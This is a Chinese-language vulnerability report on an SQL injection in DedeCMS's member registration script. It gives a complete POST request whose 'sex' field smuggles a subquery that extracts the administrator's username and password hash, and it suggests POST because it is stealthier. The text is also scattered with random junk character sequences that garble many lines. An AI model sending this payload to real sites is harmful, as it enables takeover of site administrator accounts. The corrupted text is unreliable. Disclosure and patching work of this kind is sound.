漏洞类型: SQL注射漏洞: h' B4 g# H( q7 i/ }, h b
简要描述:
4 R& k d% _# }( B - `# R! b7 t# g E9 f2 d
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
( X5 S1 m* |5 |原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.- l/ R- _; _7 ~
详细说明:跟这个漏洞/ J5 Y' ]; f, s; P. v/ G
: V! Y* B2 }% w- V; s# aWooYun: Dedecms SQL注射导致审核机制绕过漏洞3 }& ^9 ?4 V4 S3 U. I
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.8 U$ T* I7 W/ L( E! y' K5 U
POST提交以下数据,其实不用POST提交的,这样隐蔽点.: I2 {* y0 w) Q9 S
* p5 x9 v8 L, }3 O# w ?www.political-security.com/member/reg_new.php
# U/ ?( h" [. M0 F& Y- M5 e
5 O) I5 A; q9 u' N5 ]4 L& t$ OPOST5 r! ]: o: @9 L' s R6 K
, [6 J# b/ Y; x$ G8 \
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&. k6 a! U7 Y0 x/ K0 j& M
userid=c4rp3nt3r&uname=c4rp3nt3r% D$ _3 X0 Y2 N% F3 Y m1 {
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss1 l; z* x2 M; @4 r& g% M9 }2 B0 B0 m
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,, U, K! A# U7 [: ^2 n
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');* H0 X& |. J6 I1 F; P3 g
%00&vdcode=glos&agree= |